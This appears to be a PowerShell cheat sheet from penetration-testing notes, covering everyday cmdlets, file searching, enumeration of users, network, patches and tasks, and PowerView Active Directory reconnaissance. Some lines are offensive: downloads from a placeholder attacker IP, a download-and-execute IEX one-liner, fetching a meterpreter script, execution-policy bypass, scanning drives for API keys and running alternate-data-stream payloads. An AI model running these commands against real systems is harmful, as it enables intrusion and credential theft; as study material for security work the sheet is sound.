5.4 KiB
5.4 KiB
Powershell Usage
Get-Help
Get-Help Command-Name
- Show examples
Get-Help Command-Name -Examples
- Get-Command gets all the cmdlets installed on the current Computer.
Get-Command
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
Passing Output via Pipe
- A pipe passes object including methods and attributes.
Verb-Noun | Get-Member
Get-Command | Get-Member -MemberType Method
Creating Objects from Previous Cmdlets
Get-ChildItem | Select-Object -Property Mode, Name
- first - gets the first x object
- last - gets the last x object
- unique - shows the unique objects
- skip - skips x objects
Filtering Objects
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
-
Where -operator is a list of the following operators:
-
-Contains: if any item in the property value is an exact match for the specified value
-
-EQ: if the property value is the same as the specified value
-
-GT: if the property value is greater than the specified value
Sort Object
Verb-Noun | Sort-Object
Get-ChildItem | Sort-Object
Finding a File
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
Get-HotFix | Format-list | findstr <searchstring>
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
- Find backup files
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
- Find file contents
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
Showing File Content
Get-Content 'C:\Program Files\interesting-file.txt'
- Indexing lines
(Get-Content -Path file.txt)[index]
- Search
Select-String <filename> -Pattern <pattern>
Copy File Content
Copy-Item <sourcefile> <destfile>
Count Lines of Output
As an example, count all cmdlets on the system
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
Count Words
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
Checksum of File
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
Current Working Directory
Get-Location
File Metadata
ls | Format-List *
Web Request
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
- Webrequest and execute in one go
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
Base64 Decode File
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
Circumvent Execution-Policy
powershell -ExecutionPolicy Bypass -File .\<file>
Set-ExecutionPolicy Bypass -Scope Process
Enumeration
Users
Get-LocalUser
- Password not required users
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
- SID of users
Get-WmiObject win32_useraccount | Select name, sid
Network intel
- Connections
netstat -ano
- IP Address
Get-NetIpAddress
- Listening TCP Ports
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
- TCP Port by number
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
Patch level and updates
Get-Hotfix
- Find patch by HotFixID
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
wmic qfe get Caption,Description,HotFixID,InstalledOn
Drivers
driverquery
Processes
- Start processes
Start-Process <process>
- Running processes
Get-Process <process>
Scheduled tasks
schtasks /query /fo LIST /v
Get-ScheduledTaskInfo
- Scheduled Tasks, by TaskName
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
or
Get-ScheduledTask -TaskName taskname
Alternate Data Stream(ADS)
- Show ADS
Get-Item -Path file.exe -Stream *
- Open ADS
wmic process call create $(Resolve-Path file.exe:streamname)
Export Output
- Export as CSV
Get-Process <process> | Export-Csv <output.csv>
ACL
- Owner of files
Get-ACL C:\
Port Scanner
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
Ping Hosts
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
Antivirus
sc query windefend
- Service name unknown
sc queryex type=service
Using Powerview
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
- Enumerate Group Policy
Get-NetGPO
- Trust relationship to other domains
Get-NetDomainTrust
- User enumeration
Find-LocalAdminAccess
whoami /priv
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership